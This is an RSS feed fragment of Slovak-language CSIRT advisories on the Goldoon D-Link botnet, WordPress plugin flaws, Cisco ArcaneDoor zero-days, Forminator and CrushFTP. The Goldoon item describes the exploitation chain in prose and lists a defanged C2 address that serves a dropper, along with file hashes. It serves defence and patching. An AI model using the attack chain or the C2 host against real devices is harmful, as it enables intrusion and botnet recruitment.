<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/889/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kampaň botnetu „Goldoon“ zneužíva starú kritickú zraniteľnosť D-Link</title>
		<link>/posts/887</link>
					<comments>/posts/887#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 May 2024 07:02:40 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=887</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Bezpečnostní výskumníci z FortiGuard poukázali na novú útočnú kampaň šíriacu malvér/botnet Goldoon, ktorá sa zameriava na routery D-Link. Počas apríla...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci z FortiGuard poukázali na novú útočnú kampaň šíriacu malvér/botnet Goldoon, ktorá sa zameriava na routery D-Link. Počas apríla sa dvojnásobne zvýšil nárast útokov na bezpečnostnú chybu s&nbsp;označením CVE-2015-2051. Zaujímavosťou je, že táto zraniteľnosť je už takmer desať rokov stará.&nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>DAP-1522</li>



<li>DAP-1650</li>



<li>DIR-300</li>



<li>DIR-600</li>



<li>DIR-645</li>



<li>DIR-806</li>



<li>DIR-815</li>



<li>DIR-816L</li>



<li>DIR-860L</li>



<li>DIR-865L</li>



<li><strong></strong>DIR-880L<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Bezpečnostní výskumníci z&nbsp;FortiGuard upozornili na aktívnu kampaň botnetu “Goldoon“, ktorá zneužíva zraniteľnosť CVE-2015-2051.</p>



<p><strong>CVE-2015-2051 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť CVE-2015-2051 sa týka routerov D-Link a&nbsp;je aktívne zneužívaná. </strong>Táto zraniteľnosť umožňuje vzdialeným útočníkom vykonávať ľubovoľné príkazy prostredníctvom akcie GetDeviceSettings na rozhraní HNAP. Útočníci vytvárajú škodlivé pakety s&nbsp;podvrhnutými HTTP požiadavkami a škodlivými príkazmi, čím kompromitujú zariadenia. Tento útočný paket vyzerá nasledovne:</p>



<p><strong>Zraniteľnosť CVE-2015-2051 umožňuje získať úplnú kontrolu nad napadnutým zariadením. Útočníci využívajú túto zraniteľnosť na načítanie skriptu z&nbsp;adresy </strong><strong>&#8220;hxxp://94[.]228[.]168[.]60:8080&#8221;</strong><strong> zo vzdialeného servera, ktorý slúži na stiahnutie ďalšej fázy payloadu. Po stiahnutí a spustení dropperu sa na pozadí stiahne a aktivuje malvér Goldoon, ktorý nadviaže spojenie so serverom C2 a čaká na ďalšie príkazy. Malvér disponuje 27 rôznymi metódami na uskutočnenie útokov DDoS pomocou rôznych protokolov. Po vykonaní sa súbor odstráni aj spoločne so scriptom dropper pre zahladenie všetkých stôp po svojej činnosti. Na základe vykonanej analýzy telemetrických údajov poukazuje FortiGuard na dvojnásobné zvýšenie aktivity botnetu v&nbsp;apríli.</strong></p>



<p><strong><u>Analýza škodlivého softvéru poukázala na vykonávanie troch hlavných krokov:</u></strong></p>



<ol>
<li><strong></strong><strong>Malvér Goldoon najprv inicializuje požadované argumenty na nadviazanie spojenia so svojím riadiacim serverom (C2). Tieto argumenty zahŕňajú použitie &#8220;WolfSSL&#8221; na šifrovanie prevádzky a nastavenie servera Google DNS (&#8220;8.8.8.8&#8221;, &#8220;8.8.4.4&#8221;).</strong></li>



<li><strong></strong><strong>Nastaví automatické spúšťanie pre získanie perzistencie v&nbsp;napadnutom zariadení. Škodlivý softvér Goldoon môže byť spustený rôznymi spôsobmi, vrátane inicializačných súborov, aplikácií pri zavádzaní systému Linux alebo automaticky po prihlásení sa obete do napadnutého zariadenia. Tieto metódy zahŕňajú spustenie pri štarte, formou démona, alebo pri prihlásení sa do systému.</strong></li>



<li><strong></strong><strong>Po inicializácii a nastavení automatického spustenia malvér Goldoon nadviaže trvalé spojenie so serverom C2. Čaká na príkazy zo servera C2, aby spustil súvisiace správanie.</strong></li>
</ol>



<p><strong>IOCs</strong></p>



<p><a></a>C2 server</p>



<p>94[.]228[.]168[.]60</p>



<p><a></a>Súbory</p>



<p>66f21251d7f8c58316f149fec104723beb979a1215ad4e788d83f0ee6fd34696<br>712d9abe8fbdff71642a4d377ef920d66338d73388bfee542f657f2e916e219c<br>d7367d41d19baa4f1022f8eb47f7ff1e13f583265c7c26ab96d5f716fa0d61ee<br>fdf6dae772f7003d0b7cdc55e047434dbd089e0dc7664a3fae8ccfd9d10ece8c<br>aa9e6006bce7d0b4554165dba76e67c4a44d98090c9e6ac9f3dca726f6e9adbf<br>fc44018b7432d9e6a1e98f723b0402101fa6e7483d098b10133aac142c0a4a0b<br>e7b78f16d0dfc91b4c7e8fd50fc31eba1eb22ec7030af9bf7c551b6019c79333<br>0e6eb17664943756cab434af5d94fcd341f154cb36fc6f1ef5eb5cfdce68975f<br>9af8720766c5f3978718c026c2263801b08634443c93bd67022c56c6ef531ef3<br>df71219ba6f5835309479b6e3eaca73b187f509b915420656bfe9a9cc32596c2<br>48130a7c09a5c92e15b3fc0d2e1eb655e0bd8f759e01ba849f7734e32dbc2652<br>8eb9c1eaecd0dcdd242e1bc8c62a1052915b627abe2de8ce147635fb7da3bfcc<br>b050a1ff0d205f392195179233493ff5b6f44adc93fe0dba1f78c4fe90ebcc46<br>ffd2d3888b6b1289e380fa040247db6a4fbd2555db3e01fadd2fe41a0fa2debc<br>88cea61218bdeea94537b74c67873e75b8ada6d050a30d311569c3118d161c46<br>115e15fbee077a9e126cc0eb349445df34cc9404245520c702fadc5f75b6f859<br>b10e47db989e29ace6c23ed15e29f313993f95e5e615711060881dfa84618071<br>037331ab84a841b9d3cfb6f8797c1695e2dc0a2cdcc3f8f3c794dfaa50bcf0df<br>5631980fab33525f4de1b47be606cd518403f54fa71b81186f02dbf7e9ed0004<br>246142a5e3f3d3f84d8b38f98ff6897b03628e06e31016b8fafc9eb8c2b6201d<br>3123a458a6346fd14c5bd7d41cda6c9c9bdabc786366a9ab3d5e7c00132ff835<br>45bf2c9c6628d87a3cb85ee78ae3e92a09949185e6da11c41e2df04a53bb1274<br>c81cfe4d3b98d0b28d3c3e7812beda005279bc6c67821b27571240eba440fa49</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong></strong><strong>Únik informácií</strong></li>



<li><strong></strong><strong>Narušenie integrity</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu firmvéru na najnovšiu verziu.</strong></p>



<p>Škodlivý softvér opísaný v tejto správe je detegovaný a blokovaný programom FortiGuard Antivirus ako:</p>



<p>AGENT.G!tr.dldr ELF/Agent.JL!tr.dldr ELF/Agent.GLN!tr POWERSHELL/Agent.G!tr.dldr W64/Agent.GLN!tr</p>



<p>FortiGate, FortiMail, FortiClient a FortiEDR podporujú službu FortiGuard AntiVirus. Komponent FortiGuard AntiVirus je súčasťou každého z týchto riešení. Zákazníci, ktorí využívajú tieto produkty, sú chránení.</p>



<p>Služba FortiGuard Web Filtering Service blokuje server C2.</p>



<p>FortiGuard Labs poskytuje IPS signatúry proti útokom využívajúcim zraniteľnosť CVE-2015-2051: D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/05/new-goldoon-botnet-targets-d-link.html">https://thehackernews.com/2024/05/new-goldoon-botnet-targets-d-link.html</a></p>



<p><a href="https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10282">https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10282</a></p>



<p><a href="https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices">https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/887/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Phishing [Infografika]</title>
		<link>/posts/879</link>
					<comments>/posts/879#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 06 May 2024 12:02:57 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Infografika]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[VJ CSIRT]]></category>
		<guid isPermaLink="false">/?p=879</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Pripravili sme si pre Vás infografiku o najbežnejších, aktuálnych útokoch s ktorými sa môžete kedykoľvek stretnúť. Ako ich identifikovať a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Pripravili sme si pre Vás infografiku o najbežnejších, aktuálnych útokoch s ktorými sa môžete kedykoľvek stretnúť. Ako ich identifikovať a chrániť sa pred nimi? <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f4cc.png" alt="📌" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="512" height="1024" src="/wp-content/uploads/2024/05/OCAInfografika-1200x2400.OCA001-512x1024.png" alt="" class="wp-image-885"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/879/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ďalšie kritické zraniteľnosti v doplnkoch WordPress</title>
		<link>/posts/856</link>
					<comments>/posts/856#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 30 Apr 2024 05:35:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Authorization bypasses]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=856</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Doplnky obľúbenej platformy na tvorbu webových stránok obsahujú kritické zraniteľnosti, ktoré umožňujú Obchádzanie autentifikácie, vzdialené vykonávanie kódu, extrakcii citlivých údajov...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Doplnky obľúbenej platformy na tvorbu webových stránok obsahujú kritické zraniteľnosti, ktoré umožňujú Obchádzanie autentifikácie, vzdialené vykonávanie kódu, extrakcii citlivých údajov a&nbsp;získanie administrátorských oprávnení. Bolo zaznamenaných viac ako 5,5 milióna pokusov o&nbsp;aktívne zneužitie zraniteľností.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WP Automatic verzie staršie ako 3.9.2.0</li>



<li>Poll Maker &amp; Voting Plugin Team WP Poll Maker verzie staršie ako 3.4.</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-27956 (CVSS skóre 9,9)</strong></p>



<p>Kritická zraniteľnosť CVE-2024-27956 sa nachádza v doplnku WP-Automatic pre WordPress. Chyba sa týka <strong>nevhodného spracovania autentifikácie užívateľa</strong> v&nbsp;jednom zo súborov doplnku WP-Automatic, ktorú je možné <strong>obísť zaslaním špeciálne vytvoreného príkazu pre SQL databázu</strong>. Úspešné zneužitie chyby <strong>SQL injekcie (SQLi) umožňuje získať neoprávnený prístup,</strong> vytvoriť používateľské účty na úrovni administrátora, nahrať škodlivý súbor a&nbsp;tým získať kontrolu nad zraniteľnými stránkami.</p>



<p>Útočníci sa po zneužití snažia vytvoriť perzistenciu svojho prístupu a&nbsp;schovať stopy po napadnutí (webshell, backdoor). Činnosť útočníkov často obsahuje premenovanie zraniteľného súboru WP-Automatic, či inštaláciu dodatočných doplnkov pre možné vykonávanie vzdialených zmien.&nbsp;</p>



<p>Bolo zistených viac ako 5,5 milióna pokusov o&nbsp;aktívne zneužitie zraniteľností CVE-2024-27956, CVE-2024-2876 (Icegram Express), CVE-2024-2417 (User Registration)<strong> </strong>a<strong>&nbsp;</strong><a href="https://www.csirt.gov.sk/posts/834.html?csrt=4087702320029811072">CVE-2024-28890 (Forminator).</a></p>



<p><strong>CVE-2024-32514 (CVSS skóre 9,9)</strong></p>



<p>Zraniteľnosť CVE-2024-32514 v doplnku Poll Maker umožňuje <strong>autentifikovanému útočníkovi ľubovoľné nahrávanie súborov bez ich validácie.</strong> Potenciálny útočník môže <strong>nahrať škodlivý typ súboru bez akejkoľvek kontroly</strong>, z ktorého môže následne systém automaticky vykonať škodlivý kód. Pre úspešné zneužitie je potrebný prístup na úrovni používateľa, čo umožňuje vzdialené vykonávanie kódu.</p>



<p><strong>IoC:</strong></p>



<ul>
<li>Používateľ administrátor s menom začínajúcim na xtw</li>



<li>Zraniteľný súbor &#8220;/wp content/plugins/wp automatic/inc/csv.php&#8221; premenovaný na (príklad) &#8220;/wp content/plugins/wp automatic/inc/csv65f82ab408b3.php&#8221;</li>



<li>Existencia súborov s&nbsp;odtlačkom SHA1:
<ul>
<li>b0ca85463fe805ffdf809206771719dc571eb052&nbsp; web.php</li>



<li>8e83c42ffd3c5a88b2b2853ff931164ebce1c0f3&nbsp; index.php<strong></strong></li>
</ul>
</li>
</ul>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong></strong><strong>Únik citlivých informácií</strong></li>



<li><strong></strong><strong>Obchádzanie autentifikácie</strong></li>



<li><strong></strong><strong>Zvyšovanie oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu doplnku WP-Automatic na najnovšiu verziu, pravidelnú kontrolu používateľských účtov systému WordPress</strong></p>



<p><strong>Pre zmiernenie zraniteľnosti CVE-2024-23514 viac informácii </strong><a href="https://avd.aquasec.com/nvd/2024/cve-2024-32514/"><strong>tu.</strong></a><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-27956">https://nvd.nist.gov/vuln/detail/CVE-2024-27956</a></p>



<p><a href="https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html">https://thehackernews.com/2024/04/hackers-exploiting-wp-automatic-plugin.html</a></p>



<p><a href="https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/">https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-32514">https://nvd.nist.gov/vuln/detail/CVE-2024-32514</a></p>



<p><a href="https://www.recordedfuture.com/vulnerability-database/CVE-2024-32514">https://www.recordedfuture.com/vulnerability-database/CVE-2024-32514</a></p>



<p><a href="https://avd.aquasec.com/nvd/2024/cve-2024-32514/">https://avd.aquasec.com/nvd/2024/cve-2024-32514/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/856/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané zero-day zraniteľnosti Cisco</title>
		<link>/posts/854</link>
					<comments>/posts/854#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Apr 2024 06:20:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=854</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco poukázala na rozsiahlu kampaň pomenovanú ArcaneDoor, v ktorej útočníci zneužívajú dvoch zero-day zraniteľností CVE-2024-20353 a CVE-2024-20359. Úspešné zneužitie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco poukázala na rozsiahlu kampaň pomenovanú ArcaneDoor, v ktorej útočníci zneužívajú dvoch zero-day zraniteľností CVE-2024-20353 a CVE-2024-20359. Úspešné zneužitie umožňuje útočníkom šíriť malvér a&nbsp;zbierať citlivé informácie v&nbsp;cieľovom prostredí. Cisco varovala, že sa jedná o&nbsp;aktívne zneužívané zraniteľnosti na firewalloch Cisco ASA a&nbsp;FTD hackerskou skupinou UAT4356 (alias Storm-1849). Spoločnosť zároveň opravila zraniteľnosť CVE-2024-20358, umožňujúcu injektovanie príkazov v&nbsp;spomínaných zariadeniach.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Secure Firewall ASA<strong></strong></li>



<li><strong></strong>Cisco Secure Firewall Threat Defense<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Hackerská skupina UAT4356 známa pod menom Storm-1849 aktívne zneužíva zero-day zraniteľnosti firewallov/IPS CISCO ASA a&nbsp;FTD v&nbsp;rámci kampane ArcandeDoor. Skupine UAT4356 sa podarilo nasadiť dva backdoory, „Line Runner“ a „Line Dancer“, ktoré použila na infiltráciu do zariadení a sieťovej prevádzky a&nbsp;vykonanie škodlivého kódu.</strong></p>



<p><strong>CVE-2024-20353 (CVSS skóre 8,6)</strong></p>



<p><strong>Zero-day zraniteľnosť CVE-2024-20353 v&nbsp;správe webových serverov a&nbsp;VPN umožňuje neautentifikovanému vzdialenému útočníkovi spôsobiť opätovné načítanie zariadenia, čo môže viesť k&nbsp;odmietnutiu služby (DoS). Úspešné zneužitie si vyžaduje aby útočník odoslal špeciálne vytvorenú http požiadavku na webový server zariadenia.</strong></p>



<p><strong>CVE-2024-20358 a </strong><strong>CVE-2024-20359 (CVSS skóre 6,0)</strong></p>



<p><strong>Zraniteľnosti CVE-2024-20358 a CVE-2024-20359 funkcie prednahrania klientov VPN a&nbsp;modulov, umožňujú autentifikovanému lokálnemu útočníkovi vykonať ľubovoľný kód (CVE-2024-20359), resp. ľubovoľné príkazy (CVE-2024-20358) s&nbsp;oprávneniami používateľa root. Chyba</strong> <strong>CVE-2024-20358 sa týka nesprávnej sanitizácie záložného súboru v&nbsp;čase jeho obnovy a CVE-2024-20359 sa týka nesprávnej validácie súborov pri čítaní z&nbsp;pamäte. Obe zraniteľnosti si vyžadujú administrátorské oprávnenia. Útočník môže zneužiť zraniteľnosti obnovením špeciálne upraveného záložného súboru a skopírovaním vytvoreného súboru do súborového systému disk0.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Odmietnutie služby (DoS)</strong></li>



<li><strong></strong><strong>Ľubovoľné vykonávanie kódu</strong></li>



<li><strong></strong><strong>Únik informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na najnovšiu verziu softvéru .</strong></p>



<p>Pre overenie integrity svojich zariadení Cisco ASA alebo FTD môžu zákazníci postupovať podľa <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-websrvs-dos-X8gNucD2"><strong>návodu.</strong></a></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/04/state-sponsored-hackers-exploit-two.html">https://thehackernews.com/2024/04/state-sponsored-hackers-exploit-two.html</a></p>



<p><a href="https://www.securityweek.com/cisco-raises-alarm-for-arcanedoor-zero-days-hitting-asa-firewall-platforms/">https://www.securityweek.com/cisco-raises-alarm-for-arcanedoor-zero-days-hitting-asa-firewall-platforms/</a></p>



<p><a href="https://www.wired.com/story/arcanedoor-cyberspies-hacked-cisco-firewalls-to-access-government-networks/">https://www.wired.com/story/arcanedoor-cyberspies-hacked-cisco-firewalls-to-access-government-networks/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20353">https://nvd.nist.gov/vuln/detail/CVE-2024-20353</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20359">https://nvd.nist.gov/vuln/detail/CVE-2024-20359</a></p>



<p><a href="https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response">https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/854/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v doplnku WordPress</title>
		<link>/posts/834</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 23 Apr 2024 06:43:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=834</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Zásuvný modul Forminator obľúbenej platformy na tvorbu webových stránok obsahuje jednu kritickú a&#160;dve vysoko závažné zraniteľnosti. Chyby umožňujú nahrať a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Zásuvný modul Forminator obľúbenej platformy na tvorbu webových stránok obsahuje jednu kritickú a&nbsp;dve vysoko závažné zraniteľnosti. Chyby umožňujú nahrať a spustiť škodlivý kód na serveri stránky, únik citlivých informácií a&nbsp;odmietnutie služby. Zásuvný modul využíva viac ako 500 000 stránok.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong></strong>Forminator verzie staršie ako 1.29.3 <strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-28890</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-28890 bola zistená v module Forminator a umožňuje <strong>vzdialenému útočníkovi nahrať a&nbsp;spustiť škodlivý softvér na serveri stránky</strong>. <strong>Nedostatočná validácia súborov</strong> počas ich nahrávania môže viesť k získaniu citlivých informácií, zmene stránky alebo môže dôjsť k odmietnutiu služby (DoS).</p>



<p><strong>CVE-2024-31077</strong></p>



<p>Zraniteľnosť CVE-2024-31077 je <strong>chyba typu SQL injection</strong>, ktorá umožňuje <strong>vzdialenému útočníkovi s oprávneniami správcu vykonávať ľubovoľné príkazy SQL</strong> v databáze stránky. Táto zraniteľnosť môže viesť k <strong>neoprávnenému čítaniu, upravovaniu alebo odstráneniu údajov</strong> v databáze, čím sa môže poškodiť integrita dostupnosť a dôvernosť stránky.</p>



<p><strong>CVE-2024-31857</strong></p>



<p><strong>Zraniteľnosť CVE-2024-31857 je chyba typu </strong><strong>Cross-site scripting (XSS)</strong><strong>, ktorá umožňuje </strong><strong>vzdialenému útočníkovi spustiť ľubovoľný HTML kód</strong><strong> a&nbsp;skripty v prehliadači používateľa. Úspešné zneužitie tejto zraniteľnosti umožňuje </strong><strong>získať citlivé informácie,</strong><strong> ako sú prihlasovacie údaje, alebo vykonať ďalšie útoky z vnútra používateľského prostredia.</strong><strong></strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Únik citlivých informácií</strong></li>



<li><strong></strong><strong>Ľubovoľné vykonávanie kódu</strong></li>



<li><strong></strong><strong>Odmietnutie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zásuvného modelu Forminator na verziu 1.29.3 alebo novšiu.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.cybersecurity-help.cz/vdb/SB2024041832">https://www.cybersecurity-help.cz/vdb/SB2024041832</a></p>



<p><a href="https://jvn.jp/en/jp/JVN50132400/">https://jvn.jp/en/jp/JVN50132400/</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/critical-forminator-plugin-flaw-impacts-over-300k-wordpress-sites/">https://www.bleepingcomputer.com/news/security/critical-forminator-plugin-flaw-impacts-over-300k-wordpress-sites/</a></p>



<p><a href="https://www.cybersecurity-help.cz/vdb/SB2024041833">https://www.cybersecurity-help.cz/vdb/SB2024041833</a></p>



<p><a href="https://www.cybersecurity-help.cz/vdb/SB2024041834">https://www.cybersecurity-help.cz/vdb/SB2024041834</a></p>



<p><a href="https://wordpress.org/plugins/forminator/">https://wordpress.org/plugins/forminator/</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v CrushFTP</title>
		<link>/posts/831</link>
					<comments>/posts/831#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 23 Apr 2024 06:42:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=831</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/crush-ftp-e1637581663662.jpg" alt="" /></p>Na aktívne zneužívanú bezpečnostnú chybu poukázal výskumník z&#160;Airbus CERT. Zero-day zraniteľnosť umožňuje neautentifikovanému útočníkovi uniknúť z virtuálneho súborového systému (VFS)...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/crush-ftp-e1637581663662.jpg" alt="" /></p>
<p><strong>Na aktívne zneužívanú bezpečnostnú chybu poukázal výskumník z&nbsp;Airbus CERT. Zero-day zraniteľnosť umožňuje neautentifikovanému útočníkovi uniknúť z virtuálneho súborového systému (VFS) a sťahovať systémové súbory. Tieto útoky sa údajne najviac zameriavali na subjekty v USA, pričom existuje podozrenie, že mohli byť politicky motivované.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong></strong><strong>CrushFTP verzie staršie ako 11.1</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Simon Garrelou z Airbus CERT objavil a nahlásil závažnú zraniteľnosť v CrushFTP, ktorá </strong><strong>umožňuje neautentifikovanému útočníkovi uniknúť z virtuálneho súborového systému (VFS</strong><strong>) a sťahovať systémové súbory. Zraniteľnosť bola aktívne zneužívaná. Tieto útoky sa údajne najviac zameriavali na subjekty USA, pričom existuje podozrenie, že mohli byť politicky motivované.</strong></p>



<p><strong>Odporúča sa, aby všetci používatelia CrushFTP verzie 9 okamžite prešli na novšiu verziu. Spoločnosť CrushFTP a Airbus zatiaľ nezverejnili žiadne ďalšie technické podrobnosti o tejto zraniteľnosti.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu CrushFTP na verziu 10.7.1 a&nbsp;11.1.0, viac informácií nájdete </strong><strong><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update">tu</a></strong><strong>.</strong></p>



<p><strong>Zákazníci s rozšírenou podporou by mali kontaktovať spoločnosť CrushFTP na získanie aktualizácie.</strong><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/04/critical-update-crushftp-zero-day-flaw.html">https://thehackernews.com/2024/04/critical-update-crushftp-zero-day-flaw.html</a></p>



<p><a href="https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update">https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/">https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/831/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zraniteľnosti</title>
		<link>/posts/825</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 22 Apr 2024 14:55:12 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=825</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>Spoločnosť Microsoft vydala v&#160;apríli 2024 balík opráv pre operačné systémy Windows opravujúcich 149 zraniteľností, z&#160;ktorých 67 umožňuje vzdialené vykonávanie kódu....]]></description>
